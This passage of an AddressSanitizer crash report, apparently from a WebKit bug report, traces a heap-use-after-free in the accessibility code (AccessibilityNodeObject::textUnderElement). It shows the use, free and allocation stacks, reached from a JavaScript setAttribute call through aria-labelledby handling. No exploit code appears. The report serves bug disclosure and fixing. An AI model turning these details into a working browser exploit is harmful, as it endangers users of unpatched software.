(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #5 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #6 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #7 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #8 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #9 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #10 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #11 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #12 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #13 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #14 0x10a82607c 
in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #15 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #16 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #17 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #18 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #19 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n #20 0x279e6e001027 (<unknown module>)\r\n #21 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #22 0x115e2934a in llint_entry (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157734a)\r\n #23 0x115e2291a in vmEntryToJavaScript 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x157091a)\r\n #24 0x115a87757 in JSC::JITCode::execute(JSC::VM*, JSC::ProtoCallFrame*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11d5757)\r\n #25 0x115a093da in JSC::Interpreter::executeCall(JSC::ExecState*, JSC::JSObject*, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x11573da)\r\n #26 0x1150410f1 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f0f1)\r\n #27 0x115041362 in JSC::call(JSC::ExecState*, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f362)\r\n #28 0x1150416d3 in JSC::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x78f6d3)\r\n #29 0x10b0faa15 in WebCore::JSMainThreadExecState::profiledCall(JSC::ExecState*, JSC::ProfilingReason, JSC::JSValue, JSC::CallType, JSC::CallData const&, JSC::JSValue, JSC::ArgList const&, WTF::NakedPtr<JSC::Exception>&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x11f3a15)\r\n #30 0x10b48e510 in WebCore::JSEventListener::handleEvent(WebCore::ScriptExecutionContext*, WebCore::Event*) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1587510)\r\n #31 0x10a88f68e in WebCore::EventTarget::fireEventListeners(WebCore::Event&, WTF::Vector<WTF::RefPtr<WebCore::RegisteredEventListener>, 1ul, WTF::CrashOnOverflow, 16ul>) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x98868e)\r\n #32 0x10a88f170 in WebCore::EventTarget::fireEventListeners(WebCore::Event&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x988170)\r\n #33 0x10a76a041 in WebCore::DOMWindow::dispatchEvent(WebCore::Event&, WebCore::EventTarget*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x863041)\r\n #34 0x10a779aaf in WebCore::DOMWindow::dispatchLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x872aaf)\r\n #35 0x10a67b7af in WebCore::Document::dispatchWindowLoadEvent() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7747af)\r\n #36 0x10a676103 in WebCore::Document::implicitClose() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f103)\r\n #37 0x10aa1b9ce in WebCore::FrameLoader::checkCompleted() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb149ce)\r\n #38 0x10aa18d0c in WebCore::FrameLoader::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xb11d0c)\r\n #39 0x10a694493 in WebCore::Document::finishedParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x78d493)\r\n #40 0x10ac085c0 in WebCore::HTMLDocumentParser::prepareToStopParsing() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0xd015c0)\r\n #41 
0x10a733093 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x82c093)\r\n #42 0x10a6f2386 in WebCore::DocumentLoader::finishedLoading() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x7eb386)\r\n #43 0x10a181997 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27a997)\r\n #44 0x10a17b2aa in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2742aa)\r\n #45 0x10cb02c41 in WebCore::SubresourceLoader::didFinishLoading(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2bfbc41)\r\n #46 0x10260c2eb in WebKit::WebResourceLoader::didFinishResourceLoad(WebCore::NetworkLoadMetrics const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa892eb)\r\n #47 0x10260f689 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(WebCore::NetworkLoadMetrics const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8c689)\r\n #48 0x10260eba9 in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xa8bba9)\r\n #49 0x101eaf683 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0x32c683)\r\n #50 
0x101c593b5 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xd63b5)\r\n #51 0x101c62888 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit:x86_64+0xdf888)\r\n #52 0x1164b5312 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03312)\r\n #53 0x1164b5d41 in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c03d41)\r\n #54 0x7fff8da4f3c0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0xa73c0)\r\n #55 0x7fff8da302cc in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x882cc)\r\n #56 0x7fff8da2f7c5 in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x877c5)\r\n #57 0x7fff8da2f1c3 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation:x86_64h+0x871c3)\r\n #58 0x7fff8cf90ebb in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30ebb)\r\n #59 0x7fff8cf90cf0 in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30cf0)\r\n #60 0x7fff8cf90b25 in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox:x86_64+0x30b25)\r\n #61 0x7fff8b52be23 in _DPSNextEvent 
(/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x46e23)\r\n #62 0x7fff8bca785d in -[NSApplication(NSEvent) _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x7c285d)\r\n #63 0x7fff8b5207aa in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x3b7aa)\r\n #64 0x7fff8b4eb1dd in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit:x86_64+0x61dd)\r\n #65 0x7fffa33eb8c6 in _xpc_objc_main (/usr/lib/system/libxpc.dylib:x86_64+0x108c6)\r\n #66 0x7fffa33ea2e3 in xpc_main (/usr/lib/system/libxpc.dylib:x86_64+0xf2e3)\r\n #67 0x101b7156c in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development:x86_64+0x10000156c)\r\n #68 0x7fffa3192234 in start (/usr/lib/system/libdyld.dylib:x86_64+0x5234)\r\n\r\n0x6080000908a0 is located 0 bytes inside of 88-byte region [0x6080000908a0,0x6080000908f8)\r\nfreed by thread T0 here:\r\n #0 0x104b54294 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x57294)\r\n #1 0x1164fcf30 in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c4af30)\r\n #2 0x10a0e1fda in WebCore::AXObjectCache::remove(unsigned int) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dafda)\r\n #3 0x10a0e576e in WebCore::AXObjectCache::remove(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1de76e)\r\n #4 0x10c573c0b in WebCore::RenderObject::willBeDestroyed() 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266cc0b)\r\n #5 0x10c681ac3 in WebCore::RenderText::willBeDestroyed() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x277aac3)\r\n #6 0x10c57412f in WebCore::RenderObject::destroy() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x266d12f)\r\n #7 0x10c6d35ba in WebCore::RenderTreeUpdater::tearDownRenderer(WebCore::Text&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cc5ba)\r\n #8 0x10c6d22a8 in WebCore::RenderTreeUpdater::tearDownRenderers(WebCore::Element&, WebCore::RenderTreeUpdater::TeardownType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27cb2a8)\r\n #9 0x10c6d11de in WebCore::RenderTreeUpdater::updateElementRenderer(WebCore::Element&, WebCore::Style::ElementUpdate const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27ca1de)\r\n #10 0x10c6d0c4d in WebCore::RenderTreeUpdater::updateRenderTree(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c9c4d)\r\n #11 0x10c6d047b in WebCore::RenderTreeUpdater::commit(std::__1::unique_ptr<WebCore::Style::Update const, std::__1::default_delete<WebCore::Style::Update const> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c947b)\r\n #12 0x10a6757e9 in WebCore::Document::resolveStyle(WebCore::Document::ResolveStyleType) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76e7e9)\r\n #13 0x10a670185 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x769185)\r\n #14 0x10a6767b2 in 
WebCore::Document::updateLayoutIgnorePendingStylesheets(WebCore::Document::RunPostLayoutTasks) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x76f7b2)\r\n #15 0x10ccec7c6 in WebCore::TextIterator::TextIterator(WebCore::Range const*, unsigned short) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2de57c6)\r\n #16 0x10ccf8b2f in WebCore::plainText(WebCore::Range const*, unsigned short, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2df1b2f)\r\n #17 0x109f5820d in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x5120d)\r\n #18 0x109f2c9e2 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x259e2)\r\n #19 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #20 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #21 0x109f2e8d3 in WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #22 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #23 0x109f279c9 in 
WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #24 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #25 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #26 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #27 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #28 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #29 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n\r\npreviously allocated by thread T0 here:\r\n #0 0x104b53d2c in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.1.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib:x86_64h+0x56d2c)\r\n #1 0x7fffa3314281 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib:x86_64+0x2281)\r\n #2 0x116506ae4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c54ae4)\r\n #3 0x1164fbc4d in bmalloc::Allocator::allocateSlowCase(unsigned long) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1c49c4d)\r\n #4 0x116491437 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bdf437)\r\n #5 0x116490768 in WTF::fastMalloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore:x86_64+0x1bde768)\r\n #6 0x109f09a08 in WTF::RefCounted<WebCore::AccessibilityObject>::operator new(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x2a08)\r\n #7 0x109f55ef9 in WebCore::AccessibilityRenderObject::create(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x4eef9)\r\n #8 0x10a0e3e5d in WebCore::createFromRenderer(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dce5d)\r\n #9 0x10a0e2c59 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbc59)\r\n #10 0x109f2c7c3 in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x257c3)\r\n #11 0x109f58273 in WebCore::AccessibilityRenderObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x51273)\r\n #12 0x109f2a6e0 in WebCore::accessibleNameForNode(WebCore::Node*, WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x236e0)\r\n #13 0x109f2e8d3 in 
WebCore::AccessibilityNodeObject::accessibilityDescriptionForElements(WTF::Vector<WebCore::Element*, 0ul, WTF::CrashOnOverflow, 16ul>&) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x278d3)\r\n #14 0x109f2ec3e in WebCore::AccessibilityNodeObject::ariaLabeledByAttribute() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27c3e)\r\n #15 0x109f279c9 in WebCore::AccessibilityNodeObject::ariaAccessibilityDescription() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x209c9)\r\n #16 0x109f2ed5c in WebCore::AccessibilityNodeObject::hasAttributesRequiredForInclusion() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x27d5c)\r\n #17 0x109f5d550 in WebCore::AccessibilityRenderObject::computeAccessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x56550)\r\n #18 0x109f464ab in WebCore::AccessibilityObject::accessibilityIsIgnored() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x3f4ab)\r\n #19 0x10a0e2df1 in WebCore::AXObjectCache::getOrCreate(WebCore::RenderObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1dbdf1)\r\n #20 0x10a0e0b6f in WebCore::AXObjectCache::getOrCreate(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1d9b6f)\r\n #21 0x10a0e650d in WebCore::AXObjectCache::textChanged(WebCore::Node*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x1df50d)\r\n #22 0x10a820041 in WebCore::Element::attributeChanged(WebCore::QualifiedName const&, WTF::AtomicString const&, WTF::AtomicString const&, WebCore::Element::AttributeModificationReason) 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x919041)\r\n #23 0x10a826268 in WebCore::Element::didAddAttribute(WebCore::QualifiedName const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f268)\r\n #24 0x10a82607c in WebCore::Element::addAttributeInternal(WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x91f07c)\r\n #25 0x10a81f8d7 in WebCore::Element::setAttributeInternal(unsigned int, WebCore::QualifiedName const&, WTF::AtomicString const&, WebCore::Element::SynchronizationOfLazyAttribute) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9188d7)\r\n #26 0x10a81f6c1 in WebCore::Element::setAttribute(WTF::AtomicString const&, WTF::AtomicString const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x9186c1)\r\n #27 0x10b463b93 in WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x155cb93)\r\n #28 0x10b4555d8 in long long WebCore::BindingCaller<WebCore::JSElement>::callOperation<&(WebCore::jsElementPrototypeFunctionSetAttributeCaller(JSC::ExecState*, WebCore::JSElement*, JSC::ThrowScope&)), (WebCore::CastedThisErrorBehavior)0>(JSC::ExecState*, char const*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e5d8)\r\n #29 0x10b455441 in WebCore::jsElementPrototypeFunctionSetAttribute(JSC::ExecState*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x154e441)\r\n\r\nSUMMARY: AddressSanitizer: heap-use-after-free 
(/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore:x86_64+0x25bb4) in WebCore::AccessibilityNodeObject::textUnderElement(WebCore::AccessibilityTextUnderElementMode) const\r\nShadow bytes around the buggy address:\r\n 0x1c10000120c0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120d0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c10000120e0: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 00\r\n 0x1c10000120f0: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012100: fa fa fa fa fd fd fd fd fd fd fd fd fd fd fd fd\r\n=>0x1c1000012110: fa fa fa fa[fd]fd fd fd fd fd fd fd fd fd fd fa\r\n 0x1c1000012120: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012130: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012140: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012150: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\n 0x1c1000012160: fa fa fa fa 00 00 00 00 00 00 00 00 00 00 00 fa\r\nShadow byte legend (one shadow byte represents 8 application bytes):\r\n Addressable: 00\r\n Partially addressable: 01 02 03 04 05 06 07 \r\n Heap left redzone: fa\r\n Freed heap region: fd\r\n Stack left redzone: f1\r\n Stack mid redzone: 